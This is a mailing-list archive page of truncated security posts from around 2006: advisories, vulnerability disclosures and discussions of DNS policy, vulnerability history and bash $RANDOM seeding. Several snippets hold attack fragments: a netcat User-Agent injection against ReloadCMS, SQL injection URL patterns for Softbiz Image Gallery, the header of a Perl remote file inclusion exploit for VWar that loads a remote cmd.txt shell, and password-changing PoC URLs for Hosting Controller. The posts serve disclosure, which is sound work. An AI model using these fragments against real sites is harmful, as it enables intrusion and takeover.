When IPv6 is active on an interface of an ISA Server 2004, it seems that IPv6
packets are not filtered and bypass the firewall.
I try to send an ICMP IPv4 packet through the network to ISA Server, this
packet was dropped, then i try an ICMP IPv6 packet which successfully works !
The same kind o
Symantec Vulnerability Research
http://www.symantec.com/research
Security Advisory
Advisory ID : SYMSA-2006-002
Advisory Name: McAfee WebShield SMTP Format String Vulnerability
Release Date : 04-03-2005
Application : McAfee Web
http://reloadcms.com/
description: "ReloadCMS is a free CMS written on PHP and based on flat files."
vulnerability:
ReloadCMS do not properly sanitize User-Agent request header before to store it
in stats.dat file.
Example of attack, through netcat:
rgod>nc target.host.com 80
GET /path_to_reloadc
[snip]
>>
>
>
> I haven't heard anyone talk about requiring that users use their ISP's
> DNS server. Just that they should not be able to use any random DNS
> server on the internet.
This is standard practice in Wireless and other ISPs which operate pay
as you go service (hotels, conferences,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:062
http://www.mandriva.com/security/
___
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:064
http://www.mandriva.com/security/
___
Crispin Cowan wrote:
Steven M. Christey wrote:
One difficulty is that we can't really know a product's full audit
history. If a researcher looks at a piece of software and finds
nothing of interest, that doesn't get reported. (Sardonix, we hardly
knew ye.)
Agreed. Sardonix was clearly n
> 1. Resolvers and Authoritative nameservers must be separate and
> authoritative nameservers must have recursion turned off. Otherwise
> there is no way to throttle only recursive queries.
Great, for small ISP's you just doubled the number of machines they need to
dedicate to DNS.
> 2. In a smal
--- Gadi Evron <[EMAIL PROTECTED]> wrote:
> David M Chess wrote:
> > But many of us *love* to argue about taxonomies and word meanings (it's
> > cheaper than booze anyway). *8)
> 1. A user-assisted remote attack.
> 2. A client-side remote attack.
>
> I.e., we can add "user assisted" as a class
Dear nosecualestunombre :P
[EMAIL PROTECTED] wrote:
What you are talking about is "separability". You are pointing out that you can in fact
separate what is good and what is garbage from the picture . We do mention such a problem, but it
is not the worst of it at all. The real problem with thi
Hi Michael, thanks for noticing my project. You've pretty much made
my point about why I'm doing this, as robots.txt shouldn't be used as
an ACL. That's exactly the reason why I'm doing this crawling. I'm
trying to find out how widespread of an issue this is, and to see how
this is being misused
nuqneH,
On Sat, Apr 01, 2006 at 03:00:30PM -0800, Crispin Cowan wrote:
> >
> IMHO the biggest thing that makes Firefox on Linux more secure than IE
> on Windows is that you don't run Firefox as root/administrator, so when
> it gets hacked, it doesn't 0wn the machine.
Actually there is only one
Hello
Vulnerable: Softbiz Image Gallery
http://www.softbizscripts.com
Exploit :
http://example.com/imagegallery/image_desc.php?id=[SQL]
http://example.com/imagegallery/template.php?provided=[SQL]
http://example.com/imagegallery/suggest_image.php?cid=[SQL]
http://example.com/imagegallery/insert_
On Mon, 3 Apr 2006, Gadi Evron wrote:
> Looking at Microsoft's software of today, it is extremely well-written
> and professional. Far beyond that of most others. Finding
> vulnerabilities in them is extremely difficult. Most vulnerabilities you
> will find will be logical in nature and not easy.
Crispin Cowan wrote:
Kind of: absence of evidence is not evidence of absence, but that
applies both ways. The absence of a vulnerability history does not
indicate that the product is secure or insecure, it indicates that no
one has looked, or at least no one has reported looking.
Like you state
> What is stopping you from running your own local DNS server?
What is stopping you from running your own SMTP server? A port 25 block?
Well if an ISP doesn't want to play whack-a-mole with unsecured dns servers
popping up every day do you not think it likely that they will resort to the
same tec
I hope nobody generates passwords with ANY kind of pseudo-RNG. No
matter how good those algorithms are (and linear congruential
generators, the algorithm type of the bash function, usually aren't
very good), the results can be reproduced. Therefore you shouldn't
really generate your passwords with
MyBB 1.10 CrossSiteScripting
File :- inc/functions_post.php
BugTraqer :- Devil-00 < [EMAIL PROTECTED] >
we can do attack by some unfilter tags :-
Post New Thread Or New Replay With This Code :D
And Try To Move The Mouse Over The Email ;)
[code]
Multiple Vulnerabilities in LucidCMS
Author : Rusydi Hasan M
a.k.a: cR45H3R
Date : April,1st 2006
Location : Indonesia, Cilacap
--- Software description
lucidCMS is a simple and flexible content management system for
the individual or organization that wishes to manage a collecti
#!/usr/bin/perl
##
# VWar <= 1.5.0 R12 Remote File Inclusion Exploit
# Bug Found By uid0 code by zod
##
# (c) 2006
# ExploiterCode.com
##
# usage:
# perl vwar.pl
#
# perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd
#
# cmd shell example:
#
# cmd shell variable: ($_GET[cmd]);
##
#
> I know that good IP filtering on the sysklogd box is the best fix, but
> always resolving hostnames of the log messages' sender is definitely
not
> a good idea..
The -x switch takes care of this problem.
-x Disable name lookups when receiving remote messages.
This avoids deadlocks
We have reported this xss (in php display_errors) 28 May 2005.
http://bugs.php.net/bug.php?id=33173&edit=1
Replay from php developers : "Bogus".
"...Show erros is only a convenience thing to aid you while developing. Thus
no user will ever see such error messages. So in
I think I just discovered a flaw in what appears to be a common way to
see bash's $RANDOM function. bash provides a pseudo-random number,
from 0-32767, using the $RANDOM function. You can seed this by setting
RANDOM=42 or some other number. Otherwise it is seeded by the process
id and time.
There
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello,
i've found 2 vulnerabilities in Hosting Controller that allows remote
authenticated users to change every user password or upload files in every
directory. Here are the PoC:
This allows to modify passwords:
http://[URL]/admin/accounts/AccountAc
DESCRIPTION:
I've found another Internet Explorer Address Bar Spoofing Vulnerability that
can be exploited by phiser. This allow attacker inject a malcious
shockwave-flash application into Internet Explorer while it is display another
URL (even trusted sites).
If you are loading a shockwave-fl
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1000-2[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 3rd, 2006
===
Ubuntu Security Notice USN-266-1 April 03, 2006
dia vulnerabilities
CVE-2006-1550
===
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
Steven M. Christey wrote:
> The fact that a product has a long history of bugs should not be
> regarded as an indicator of its current level of security compared to
> other products.
>
Why? Past performance may not be a perfect predictor of future
performance, bit it is very often one of the bes
==
Secunia Research 03/04/2006
- AN HTTPD Script Source Disclosure Vulnerability -
==
Table of Contents
Affected Software.
Moroccan Security Team (|ucif3r)
Greetz To All Freind
Phpwebgallery 1.4.1 is vulnerable to SQL Injection Attacks
The flaw is due to input validation errors in the "category.php" script when
handling the "search"variables, which could be exploited by malicious people to
conduct SQL injection at
30 matches
Mail list logo